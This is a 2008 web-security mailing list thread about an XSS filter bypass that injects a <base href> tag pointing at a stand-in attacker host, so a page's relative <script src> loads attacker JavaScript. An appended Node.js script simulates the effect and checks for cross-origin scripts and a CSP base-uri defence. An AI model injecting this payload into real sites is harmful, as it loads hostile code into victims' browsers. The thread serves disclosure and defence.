
Re: [WEB SECURITY] Nice little XSS trick



Sounds like this could be due to the difference between Strict and
Quirks mode rendering.

On Tue, Jul 15, 2008 at 10:00 AM, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
> Definitely. Inserting <base> tag in <body> of an HTML document works
> in Firefox 2.0.0.15
>
> Thanks
> Prasad Shenoy
>
> On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>> Prasad Shenoy wrote:
>>>
>>> Amit -
>>>
>>> When you say observed by FF 2, I guess you mean this should not work
>>> in FF 2 correct? But it works with FF 2.
>>>
>>
>> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
>> have information to the contrary, please share). That doesn't mean the
>> attack completely fails - it means that the injection point must be inside
>> the HEAD section (less common, but may still happen).
>>
>>> As this is a very simple example, I would like to believe that you are
>>> assuming that in order to invoke functions from the attacker
>>> controlled JS file (because there is no JS involved in the payload),
>>> the attacker would create a file with the same filename and function
>>> names as the one on the victim's domain. This way the actual (good) JS
>>> file will be overwritten by the attacker controlled JS and all the
>>> functions will be called from cross domain.
>>>
>>
>> Exactly.
>>
>> -Amit
>>
>>
>>> Valid?
>>>
>>> Thanks
>>> Prasad Shenoy
>>>
>>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>>
>>>>
>>>> Hi list
>>>>
>>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>>> on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>>>> tag to force loading of JS code from the attacker's host. Consider a page
>>>> with an XSS vulnerability such as:
>>>>
>>>> <html>
>>>> ...
>>>> ***XSS code may be embedded here***
>>>> ...
>>>> <script src="/foo/bar.js"></script>
>>>> ...
>>>> </html>
>>>>
>>>> Now, an attacker can inject <base href="http://www.attacker.tld/">, and
>>>> next thing you know, the browser (IE, at least) loads the JS from
>>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>>> "explicit" JS code involved in the payload itself.
>>>>
>>>> Note that according to the HTML standard, BASE should be placed in the
>>>> HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>>>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>>>
>>>> Thanks,
>>>> -Amit
>>>>
>>>>
>>>>
>>>> ----------------------------------------------------------------------------
>>>> Join us on IRC: irc.freenode.net #webappsec
>>>>
>>>> Have a question? Search The Web Security Mailing List Archives:
>>>> http://www.webappsec.org/lists/websecurity/archive/
>>>>
>>>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS
>>>> Feed]
>>>>
>>>> Join WASC on LinkedIn
>>>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>>>
>>>>
>>>>
>>>
>>>
>>>
>>>
>>
>>
>
>
>
> --
> Ah! the joy of hacking....
>

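The trick Amit describes above, as an added example that is not code from the thread or from anyone on it: a small Node.js script that resolves the page's relative <script src> the way a browser does once a <base href> is present, then runs the two checks a defender would want, a cross-origin audit of the resolved script URLs and a check of the Content-Security-Policy base-uri directive. The document URL, the attacker host, the page body and the CSP strings are all constructed for the demo. Two facts it relies on: the current HTML standard makes the first <base> element with an href the document base URL wherever it appears in the tree, so the FF 2 head-only behaviour discussed in the thread is not something to count on in today's browsers; and CSP's base-uri directive is the mechanism that lets a site forbid an injected base outright.

```javascript
// Added example, not code from the thread: simulate what the browser does to
// a relative <script src> once an attacker has injected <base href>, then run
// the two checks a defender would want. Only Node's built-in URL class is used.
// The document URL, the attacker host and the page body below are constructed
// for this demo.

const DOCUMENT_URL = 'https://www.victim.example/account';

// The vulnerable page from the thread with the injection point filled in:
// the <base> lands in <body>, after <head> has already closed.
const VULNERABLE_PAGE = `<html>
<head><title>Account</title></head>
<body>
<p>Welcome back, <base href="http://www.attacker.example/"></p>
<script src="/foo/bar.js"></script>
</body>
</html>`;

// Same page without the injected markup, for comparison.
const CLEAN_PAGE = VULNERABLE_PAGE.replace('<base href="http://www.attacker.example/">', '');

const ATTR_RE = /(\w[\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Parse one start tag's attribute text into a lower-cased name -> value map.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Every <tagName ...> start tag in document order, as attribute maps.
function findTags(html, tagName) {
  const re = new RegExp(`<${tagName}\\b([^>]*)>`, 'gi');
  return [...html.matchAll(re)].map(m => parseAttrs(m[1]));
}

// Document base URL as the HTML spec defines it: the first <base> element
// with an href wins, wherever it sits in the tree; otherwise the document URL.
function documentBaseUrl(html, documentUrl) {
  const base = findTags(html, 'base').find(a => a.href !== undefined);
  if (!base) return documentUrl;
  try {
    return new URL(base.href, documentUrl).href;
  } catch {
    return documentUrl; // unparseable href: fall back to the document URL
  }
}

// Resolve each <script src> the way the browser will after base handling.
function resolveScriptSources(html, documentUrl) {
  const base = documentBaseUrl(html, documentUrl);
  return findTags(html, 'script')
    .filter(a => a.src !== undefined)
    .map(a => new URL(a.src, base).href);
}

// Check 1: which script URLs now resolve to an origin other than the page's?
function crossOriginScripts(html, documentUrl) {
  const origin = new URL(documentUrl).origin;
  return resolveScriptSources(html, documentUrl)
    .filter(u => new URL(u).origin !== origin);
}

// Check 2: would the page's CSP base-uri directive let this <base> through?
// Handles 'none', 'self' and explicit origins, the forms seen in real policies.
function baseUriAllowed(cspHeader, html, documentUrl) {
  const base = findTags(html, 'base').find(a => a.href !== undefined);
  if (!base) return true;                         // nothing to restrict
  const directive = cspHeader.split(';')
    .map(s => s.trim().split(/\s+/))
    .find(parts => parts[0].toLowerCase() === 'base-uri');
  if (!directive) return true;                    // policy is silent on base-uri
  const sources = directive.slice(1).map(s => s.toLowerCase());
  if (sources.includes("'none'")) return false;
  const baseOrigin = new URL(base.href, documentUrl).origin;
  const docOrigin = new URL(documentUrl).origin;
  if (sources.includes("'self'") && baseOrigin === docOrigin) return true;
  return sources.some(s => {
    try { return new URL(s).origin === baseOrigin; } catch { return false; }
  });
}

console.log('clean page loads:     ', resolveScriptSources(CLEAN_PAGE, DOCUMENT_URL));
console.log('injected page loads:  ', resolveScriptSources(VULNERABLE_PAGE, DOCUMENT_URL));
console.log('cross-origin scripts: ', crossOriginScripts(VULNERABLE_PAGE, DOCUMENT_URL));
console.log("base-uri 'self' stops it:",
  !baseUriAllowed("default-src 'self'; base-uri 'self'", VULNERABLE_PAGE, DOCUMENT_URL));
```

Run it with node and the clean page resolves /foo/bar.js against the victim origin while the injected page resolves it against the attacker host, which is the whole point of the trick: the payload carries no script of its own, and it is the site's own <script src> that fetches attacker code. The cross-origin audit is what a reviewer or a scanner can run over rendered pages; the base-uri check is the fix, since a policy of base-uri 'self' (or 'none' if the site never uses <base>) makes the browser ignore the injected element regardless of where in the document it lands.

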
Brought to you by http://www.webappsec.org